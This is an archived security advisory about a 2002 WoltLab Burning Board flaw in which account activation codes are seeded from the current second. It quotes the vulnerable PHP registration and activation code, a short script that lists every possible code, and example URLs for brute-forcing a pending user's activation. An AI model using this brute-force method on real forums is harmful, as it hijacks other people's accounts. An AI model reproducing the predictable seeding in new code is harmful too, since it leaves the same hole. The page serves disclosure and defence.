SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   WoltLab Burning Board (wBB) Vendors:   Woltlab
WoltLab Burning Board Forum Lets Remote Users Hijack Newly Assigned User Accounts
SecurityTracker Alert ID:  1004390
SecurityTracker URL:  http://securitytracker.com/id/1004390
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 28 2002
Impact:   User access via network
Exploit Included:  Yes  
Version(s): 1.1.1
Description:   An authentication vulnerability was reported in the WoltLab Burning Board web forum software. A remote user may be able to hijack a newly registered user account.

It is reported that WoltLab Burning Board (wBB) uses predictable or guessable temporary passwords when it creates a new user account. If another user has requested a new account but has not yet activated the registration, the user's account may be hijacked.

To determine how many users exist on the forum, a remote user can register for a new account. The remote user will receive a confirmation e-mail that contains the following type of URL to activate the account:

http://forum.dom/forum/action.php?action=activation&userid=345&code=1563109322

In the above example, it is shown that any subsequent user will be assigned userid of 346 or higher. So, a remote user can attempt to guess the 'code' for any subsequent user. According to the report, the wBB software uses the date to seed a function that will generate only a limited number of codes (possibly 30 integer words). So, a remote user can feasibly conduct a brute force guessing attack to guess the proper code for a newly assigned user account.

A demonstration exploit that will apparently generate all of the possible codes is provided:

<?php
for($i=0; $i<60; $i++)
{
mt_srand($i);
echo mt_rand()."<BR>";
}
?>

Impact:   A remote user may be able to guess the password of a newly requested user account before the user account registration has been activated.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.woltlab.de/ (Links to External Site)
Cause:   Authentication error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  wbbboard 1.1.1 registration _new_users_vulnerability_


wbbboard 1.1.1 registration _new_users_vulnerability_
--------------------------------------------------
wbbboard  : i cant find any contact info in credits :(
            i send a message to wbbhacks.de and mywbb.de
            (support forums), they didnt reply for 3
            days (i think enough)

Affected program         : wbbboard 1.1.1
Vendor                   : http://www.woltlab.de/
Vulnerability-Class      : security bug
OS specific              : No
Remote                   : Yes
Problem-Skill            : High for users waiting for registration activatin
                           None for activated users

SUMMARY

wbboard is php & mysql based forum.

Here some code(register.php)
---------------------------
$datum = date("s");
mt_srand($datum);
$z = mt_rand();
$db_zugriff->query("INSERT INTO bb".$n."_user_table
$db_zugriff->(username,userpassword,useremail,regemail,groupid,regdate,lastvisit,lastactivity,activation)
$db_zugriff->VALUES
$db_zugriff->('$name','$password','$email','$email','$default_group','$time','$time','$time',$z)");
---------------------------
after that script mail to user@mail.dom with url for activation
here some code from action.php
---------------------------
if($action=="activation") {
        $result = activat($userid,$code);
        if($result == 1) eval ("\$output = \"".gettemplate("error1")."\";");
        if($result == 2) eval ("\$output = \"".gettemplate("error22")."\";");
        if($result == 3) eval ("\$output = \"".gettemplate("error23")."\";");
        if(!$result) {
                $user_id = $userid;
                eval ("\$output = \"".gettemplate("note21")."\";");
                $user_password = getUserPW($userid);
                session_register("user_id");
                session_register("user_password");
                setcookie("user_id", "$user_id", time()+(3600*24*365));
                setcookie("user_password", "$user_password", time()+(3600*24*365));
        }
        $ride = "main.php?styleid=$styleid$session";
}

IMPACT

You can steal NEW user account with his passwords.

EXPLOIT

Register in forum you will recieve a message like this:
To continue registration
http://forum.dom/forum/action.php?action=activation&userid=345&code=1563109322
Now You Know how many users on forum and can hijak users with
 userid=346(for example)
 
HEART OF EXPLOIT
----------------------
| $datum = date("s");|
| mt_srand($datum);  |  this code result only 30 original integer words :)
| $z = mt_rand();    |  i think it is not so hard to bruteforce
----------------------
http://forum.dom/forum/action.php?action=activation&userid=346&code=1898087491
http://forum.dom/forum/action.php?action=activation&userid=346&code=1309289693
....
http://forum.dom/forum/action.php?action=activation&userid=346&code=356268007

You can get all variations with this script
<?php
for($i=0; $i<60; $i++)
{
mt_srand($i);
echo mt_rand()."<BR>";
     ^^^^^^^^^ here you are :)
}
?>

 SOLUTION:
   use simple rand() or realy unpredictable md5(uniqid(rand(),1))



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC